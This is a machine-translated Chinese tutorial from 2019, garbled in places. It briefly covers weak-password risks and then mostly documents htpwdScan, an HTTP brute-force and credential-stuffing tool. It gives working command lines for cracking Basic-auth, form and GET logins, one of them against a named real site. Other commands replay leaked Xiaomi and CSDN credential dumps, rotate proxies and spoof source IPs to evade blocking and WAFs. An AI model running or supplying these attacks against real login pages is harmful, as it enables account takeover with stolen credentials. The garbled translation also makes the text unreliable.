Interface Vulnerability
Author: Wang Yuyang
Time: 2019-06-07
Weak passwords
Weak passwords, refers usually easy to guess or crack passwords tool to crack people; weak passwords often great harm.
Weak passwords hazards:
- An attacker can easily enter by weak passwords or system administration page, and ultimately achieve the purpose of the control authority
- You can get a person's relative's account privileges by weak passwords
Data protection and the use of weak passwords, in fact, transparent information.
The most common weak passwords:
Fuzz weak password: https: //github.com/TheKingOfDuck/fuzzDicts
Network experts advice is: "+ case + digital + letter symbol" is a relatively safe password policy
Some password suggestions:
- NA as a pure digital password policy
- Without using simple digital logic consecutive regular, letter, symbol combination as a password policy
- The password should be at least 8
- Four different character types of policies
- Do not include password abbreviated content, and so another name
Interface Vulnerability: HTTP password blasting
htpwdScan: HTTP blasting, hit a script library
htpwdScan: is based on a written python HTTP brute, hit attack script library
- Support batch check and import HTTP3 agents, low-hit library can successfully attack most of the site, bypassing most of the waf
- Direct access to leaked on social network library, the library launched the attack hit
- Support for importing large dictionary
A simple example of htpwdScan
HTTP Basic Authentication
htpwdScan.py -u=http://auth.58.com/ -basic user.txt password.txt
Import user name and password to dictionary
Form crack
htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err="success":false"
Importing from post2.txt caught http package, user and passwd is the need to crack parameters, user.txt password.txt is saved password dictionary file
success ": false failure marker selection, the tag if the double quotation marks, please remember to escape with forward slashes
GET parameters crack
htpwdScan.py -d passwd=password.txt -u="http://xxx.com/index.php?m=login&username=test&passwd=test" -get -err="success":false"
Use -get parameter tells the script here is a GET request
Attack hit library
htpwdScan.py -f = post.txt -database loginname, passwd = xiaomi.txt -regex = "(\ S +) \ s + (\ S +)" -err = "user name or password is incorrect" -fip
htpwdScan.py -f = post.txt -database passwd, loginname = csdn.net.sql -regex = "\ S + # (\ S +) # (\ S +)" -err = "user name or password is incorrect" -fip
Csdn library use millet and launch attacks hit the library. capture HTTP request is post.txt
-Regex parameter setting parameters are extracted from the file of regular expressions, where required packet, the packet mode parentheses ()
Millet data row format
[email protected] xxxxxxx
i.e.(用户名)空白字符(密码)
(\S+)\s+(\S+)
You may designate a non-blank character filled take loginname, while the second filling nonblank take passwdcsdn rows of data format
zdg # 12344321 # [email protected]
Positive expressions Writing\S+ # (\S+) # (\S+)
After the first non-empty string # filled passwd, after the second filling loginname # nonblank
Note that the order parameter is important
-fip random IP is enabled forgery
Checking HTTP proxy
htpwdScan.py -f = post.txt -proxylist = proxies.txt -checkproxy -suc = "user name or password is incorrect"
To break a site, use a proxy batch test whether the connectivity target site, the HTTP request to save post.txt, then set the communication parameters are marked with -suc
A simple and practical way to check:
htpwdScan.py -u=http://www.baidu.com -get -proxylist=available.txt -checkproxy -suc="百度一下"
Complete Parameter Description
Scripting support more small features, please patience to read full instructions below. The proposed multi-use
-debug
parameters to see the HTTP request if there are problems, no problem and then initiate a real crack.
usage: htpwdScan.py [options]
* An HTTP weak pass scanner. By LiJieJie *
optional arguments:
-h, --help 显示帮助
Target:
-u REQUESTURL 设定目标URL, 示例.
-u="https://www.test.com/login.php"
-f REQUESTFILE 从文件导入HTTP请求
-https 当从文件导入HTTP请求时,启用https(SSL)
-get 使用GET方法,默认: POST
-basic [ ...] HTTP Basic 暴力破解.
示例. -basic users.dic pass.dic
Dictionary:
-d Param=DictFile [Param=DictFile ...]
为参数设定字典文件,
支持哈希函数如 md5, md5_16, sha1.
示例. -d user=users.dic pass=md5(pass.dic)
Detect:
-no302 无视302跳转, 默认302敏感
-err ERR [ERR ...] 响应文本的破解失败标记,
示例. -err "user not exist" "password wrong"
-suc SUC [SUC ...] 响应文本中的破解成功标记,
e.g. -suc "welcome," "admin"
-herr HERR 响应HTTP头的破解失败标记
-hsuc HSUC 响应HTTP头的破解成功标记
-rtxt RetryText 响应文本中的重试标记,出现则重试请求,
示例. -rtxt="IP blocked"
-rntxt RetryNoText 响应文本中的重试标记,未出现则重试请求,
示例. -rntxt="<body>"
-rheader RetryHeader 响应头中的重试标记,出现则重试请求,
示例. -rheader="Set-Cookie:"
-rnheader RetryNoHeader
响应头中的重试标记,未出现则重试请求,
示例. -rheader="HTTP/1.1 200 OK"
Proxy and spoof:
-proxy Server:Port 设定少量HTTP代理
示例. -proxy=127.0.0.1:8000,8.8.8.8:8000
-proxylist ProxyListFile
从文件批量导入HTTP代理,
示例. -proxylist=proxys.txt
-checkproxy 检查代理服务器的可用性.
可用代理输出到 001.proxy.servers.txt
-fip 生成随机X-Forwarded-For欺骗源IP
-fsid FSID 生成随机session ID. 示例. -fsid PHPSESSID
-sleep SECONDS 每次HTTP结束,等待SECONDS秒,
避免IP被临时屏蔽,进入黑名单
Database attack:
-database DATABASE 导入社工库中的数据.
示例. -database user,pass=csdn.txt
-regex REGEX 从社工库中提取数据的正则表达式,必须分组.
示例. -regex="(\S+)\s+(\S+)"
General:
-t THREADS 工作线程数,默认50
-o OUTPUT 输出文件. 默认: 000.Cracked.Passwords.txt
-debug 进入debug模式检查HTTP请求和HTTP响应
-nov 只显示破解成功的条目,不显示进度
-v show program's version number and exit
Script installation package analysis
lin directory
- cmdline.py: parse command line parameters, verify the integrity
- console_width.py: width computer terminal, output of the adaptive
- encodings.py: platform-dependent encoding and decoding
- proxy.py: Import HTTP proxy
- queue.py: generating a queue Dictionary
- request_fil.py: parsing the text file and parses the HTTP request Import
- request.py: initiating HTTP request, analysis of the HTTP response determination logic
dict directory
- The directory is password file directory
BurpSuite blasting password page
- Burp software can use brute force